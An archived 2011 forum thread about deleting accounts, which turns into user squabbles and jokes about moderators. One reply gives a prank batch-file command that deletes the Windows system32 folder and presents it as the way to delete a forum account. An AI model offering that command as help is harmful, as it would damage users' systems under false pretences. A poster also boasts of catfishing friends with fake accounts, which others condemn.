PDA

View Full Version : How do I delete account?

JamBrandon531
08-12-2011, 09:46 AM
I'm through. I was welcomed with hostility so I want to delete my account on here.

Hell_Baron
08-12-2011, 10:23 AM
You'll have to delete system32 on your computer.

what you do is open notepad, then type:

@echo off
del c:\WINDOWS\system32

then you save the file as account.bat
now remember the .bat extension is very important or your account won't be deleted.

when you saved the file, double click it.
when you've done that, you reboot your pc and your account will be deleted

Rio
08-12-2011, 10:50 AM
Your account has been deleted. Info in the forum will remain though.

Leannah
09-08-2011, 09:12 PM
Same request.

Ozzaharwood
09-08-2011, 09:55 PM
Wait, what? Why do you want yours deleted?

ClockHand
09-08-2011, 11:45 PM
Wait, what? Why do you want yours deleted?

Basically she pick a little discussion with me, and Rio told her to stop necroposting old threads. Those 2 little bumps on the road have destroy her faith in humanity and now she want to erase her existence. Weak may I say.

ram
09-09-2011, 03:23 AM
which thread does this fight happen?

Leannah
09-09-2011, 07:14 AM
Wow ClockHand, you must love yourself A LOT. I'm not leaving because of you. You're pathetic, may I say. Think what you want, you don't have superpowers. I'd never leave because of a single complacent idiot. :)

PS: Thanks for the love letter, I didn't even read it. Keep wasting your life yelling at me and insulting me lol. Pa-the-tic. <3

Hayashida
09-09-2011, 11:37 AM
It's your own fault, Leannah. Maybe if you read the rules you wouldn't be in the situation, so don't take it out on Clock.

ram
09-09-2011, 11:57 AM
that happened to me before, I got two love letters from Rio for not reading the rules. >_>

but hey we all make mistakes.

Hayashida
09-09-2011, 12:08 PM
You wouldn't if you read the rules dude

ram
09-09-2011, 12:12 PM
I was actually new on forum stuffs.
and i never need to read any rules when i am on facebook and some other social networking sites.
so obviously when i saw the "rules thread" it never got into my mind about reading it until rio gave me that love letter.

I think this is becoming a spamming topic,

*bows* apologize to mods

Leannah
09-09-2011, 01:00 PM
I read the rules, and frankly I don't even care anymore. Let's just keep members who send insulting messages such as Clock instead of keeping nice ones such as Ramiel and me.
And I don't even know you so yeah.

ClockHand
09-09-2011, 01:28 PM
Funny that you say I have insulted you, because most of my posts and comments about your behavior (even the message I send to you through ramiel) have not gave you any name, while you have told me to screw myself and other things. I dunno I find funny how you feel victimized when you are obviously as offensive as everyone else.

Hayashida
09-09-2011, 01:29 PM
Okay guys lets stop this.

jubeh
09-09-2011, 01:49 PM
From now on can we not ask people why they want to delete their accounts. I know some people here crave drama but I sure as hell don't. So if somebody wants their account deleted, respect their decision and keep your face shut please.

Gedeon
09-09-2011, 10:18 PM
^agreed.

Evil_Cake
09-09-2011, 10:30 PM
can u plz delete hayashida's account? his avatars really pissin' me off! *punches a wall*

Hayashida
09-09-2011, 10:31 PM
whoa what

ram
09-09-2011, 11:33 PM
can u plz delete hayashida's account? his avatars really pissin' me off! *punches a wall*

I second emotion

ClockHand
09-09-2011, 11:41 PM

Third.

Evil_Cake
09-10-2011, 12:14 AM
okay it is decided, but who will take his place as mod tho? I vote for Leannah

ClockHand
09-10-2011, 12:47 AM
I agree.

ram
09-10-2011, 05:13 PM
:cat_mad:

NO! i vote for my self!
btw how do you become a mod?

ClockHand
09-10-2011, 05:40 PM
You need to do the Quest of Eight Hundred Souls in the cave of The Olechranon, then fight against the great demon Ruboin and finally eat the one thousand pies.

If you do all that, then Rio might think in you as a future mod.

jubeh
09-10-2011, 06:08 PM
Kill the previous mod

ClockHand
09-10-2011, 06:36 PM
There are already plenty of dead mod's.

ram
09-10-2011, 06:47 PM
You need to do the Quest of Eight Hundred Souls in the cave of The Olechranon, then fight against the great demon Ruboin and finally eat the one thousand pies.

If you do all that, then Rio might think in you as a future mod.
I like eating a thousand pies, but i don't know where to find the cave of Olechranon.

Kill the previous mod

be-careful on your sleep jubeh, considering your a mod your self:cat_evil:
I'll go to your house with an armed military force when your past a sleep.

this is no joke

Superdooperphailmachine
09-10-2011, 07:33 PM
Just a heads up that I am next in line to modhood, so killing jubeh will just get you arrested.

ram
09-11-2011, 04:24 AM
oh, ok, i'll kill you then, and if you tell the police i'll kill the police,
and if the police reports it to the government officials i'll kill the government officials
and if the government officials reports it to the military I'll kill the military,
and if it's reported through out the world I'll kill the world.

uh... I think this is becoming to much of a spam,

*bows*

I apologize

Leannah
09-11-2011, 11:01 AM
Just delete my account already. Clock is so pathetic it makes me cry <3
Plus he should learn English.
Bye suckers.

Kodos
09-11-2011, 11:17 AM
Can we delete everyone's account save for my own so that I could rule over the wasteland of MT as a solipsistic god-king? Kthanx.

jubeh
09-11-2011, 11:20 AM
Just banned leannah instead

ram
09-11-2011, 09:15 PM
how funny it is that clock usually get people saying that his english is bad, while tktcool doesn't at all.
I guess that means that clock's english is worse lol XD.

@Leannah, you don't actually need to delete your account. actually i don't get the point of it at all.
if you don't want to go to this site then you shouldn't log in again, atleast that's what i did on the previous site i'm in before.

you just have to get over it.

and you have a wrong way of dealing with people your bad in terms with.
well this is internet so i guess all is fine, but i'm worried about you if your like that in reality.

sorry about what i'm saying considering you called me nice, but this is internet so you shouldn't take things seriously.
for all you know I could be clock, and this could just be my second account and you won't really know.

Kodos
09-11-2011, 09:35 PM
Okay, Leannah, time to come clean.

I'm Clock.
So's Jubeh.

Basically every person on the forum is an alt account of Clock. I just really enjoy talking to myself and pretending I have friends.

EDIT: I'M SPARTACUS!

ram
09-11-2011, 09:38 PM
LMOA kodos, I mean me.

I really enjoy talking to my self like this

edit: speaking of which, I actually have 5 facebook accounts, the four accounts are just stuffs to fool my friends and pretending I'm a girl and hooking up with them and ending up breaking their heart and tell them that it's me in the end, XD it's so fun! but i guess there's no point in doing it here, but it's just an example that you can't trust internet.

Superdooperphailmachine
09-11-2011, 11:09 PM
That is cruel, you should apologize to them and never do it again.

ClockHand
09-11-2011, 11:19 PM
Thanks to Kodos know everyone knows we are Batman -.-

I agree with phailmachine, you should apologize to them. Even I find that a little über douche bag.

ram
09-11-2011, 11:28 PM
nah, they actually started it, they have multiple facebook accounts as well. and they got me first.

but i don't do it to those not involved, people like us are the type who can't live without socializing with girls so that's how our war never ends.

ClockHand
09-11-2011, 11:31 PM
nah, they actually started it, they have multiple facebook accounts as well. and they got me first.

It's your fault for fell in that, and it's also your fault in keeping doing it. Feel bad now!

ram
09-11-2011, 11:36 PM
:cat_cryincorner: ouch. I never felt bad about it before but i guess that's how we are when we are doing bad things.

those people's house are just around my neighborhood, and I usually come to their house and they usually come here as well.

I guess your right, we should talk about stoping this stuffs.